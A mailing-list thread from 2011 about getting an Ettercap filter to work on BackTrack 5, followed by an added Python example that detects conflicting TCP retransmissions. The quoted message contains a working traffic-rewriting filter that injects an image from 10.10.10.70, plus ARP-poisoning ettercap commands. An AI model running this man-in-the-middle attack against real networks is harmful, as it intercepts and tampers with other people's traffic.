I've not tried to use Ettercap in BT5 as yet. However, you can file BT5 bug reports here: http://redmine.backtrack-linux.org:8080/
Ryan Dewhurst
blog www.ethicalhack3r.co.uk
projects www.dvwa.co.uk | www.webwordcount.com
twitter www.twitter.com/ethicalhack3r

On Wed, Jun 15, 2011 at 1:13 PM, Joshua Wright <[email protected]> wrote:
> Has anyone successfully used Ettercap with a filter on BT5?
>
> On BT4R2, this script works like a champ:
>
> if (ip.proto == TCP && tcp.dst == 80) {
>     if (search(DATA.data, "If-Modified-Since")) {
>         replace("Accept-Encoding", "If-PACified-Since");
>         msg("Killed If-Modified-Since\n");
>     }
> }
> if (ip.proto == TCP && tcp.src == 80) {
>     replace("img src=", "img src=\"http://10.10.10.70/pwned.jpg\" ");
>     msg("pwned image injected\n");
> }
>
> # etterfilter -o pwned.ef pwned.filter
> # ettercap -TqM arp:remote -F pwned.ef // //
>
> In testing with BT5 however, I see the logging messages, and the packets
> are injected by Ettercap, but the original frames are not dropped. I
> validated this on the victim where he gets the original packets
> immediately followed by the Ettercap-modified packets. The follow-up
> packets are dropped by the victim as TCP retransmissions.
>
> I confirmed this behavior on BT5 VM and booting from a DVD natively.
>
> I'm guessing this is due to something having changed in the kernel from
> BT4R2 to BT5, but I'm not sure what it could be. I checked
> /sys/net/ipv4/ip_forward, but it is set to 0. Any other suggestions?
>
> Thanks,
>
> -Josh
> _______________________________________________
> Pauldotcom mailing list
> [email protected]
> http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
> Main Web Site: http://pauldotcom.com
>
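The symptom described in the quoted message (the original segment arriving first, then a rewritten one at the same sequence numbers) is something a monitoring host can detect. The following is an added example, not part of the original thread: it flags TCP segments whose bytes conflict with data already seen at the same sequence numbers, and the segment tuples and addresses in it are constructed sample data.

```python
from collections import defaultdict


def find_conflicting_retransmissions(segments):
    """Flag segments whose bytes disagree with data already seen at the
    same TCP sequence numbers. Identical retransmissions are benign and
    are not reported; the first copy of each byte is the reference."""
    seen = defaultdict(dict)  # flow tuple -> {sequence number: byte value}
    findings = []
    for index, (src, sport, dst, dport, seq, payload) in enumerate(segments):
        flow = (src, sport, dst, dport)
        stream = seen[flow]
        positions = [(seq + off) & 0xFFFFFFFF for off in range(len(payload))]
        overlap = sum(1 for pos in positions if pos in stream)
        mismatch = sum(
            1 for pos, byte in zip(positions, payload)
            if pos in stream and stream[pos] != byte
        )
        if mismatch:
            findings.append({"index": index, "flow": flow, "seq": seq,
                             "overlap": overlap, "mismatch": mismatch})
            continue  # do not let the conflicting copy replace the reference
        for pos, byte in zip(positions, payload):
            stream.setdefault(pos, byte)
    return findings


# Constructed sample: one server-to-client flow (documentation addresses).
SERVER, CLIENT = "192.0.2.10", "192.0.2.20"
SAMPLE_SEGMENTS = [
    (SERVER, 80, CLIENT, 40000, 1000, b"<p>hello</p>"),    # original data
    (SERVER, 80, CLIENT, 40000, 1000, b"<p>HELLO</p>!!"),  # same seq, altered
    (SERVER, 80, CLIENT, 40000, 1012, b"<p>next</p>"),     # next in-order data
    (SERVER, 80, CLIENT, 40000, 1012, b"<p>next</p>"),     # benign retransmit
]

if __name__ == "__main__":
    for finding in find_conflicting_retransmissions(SAMPLE_SEGMENTS):
        print("conflicting retransmission:", finding)
```
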
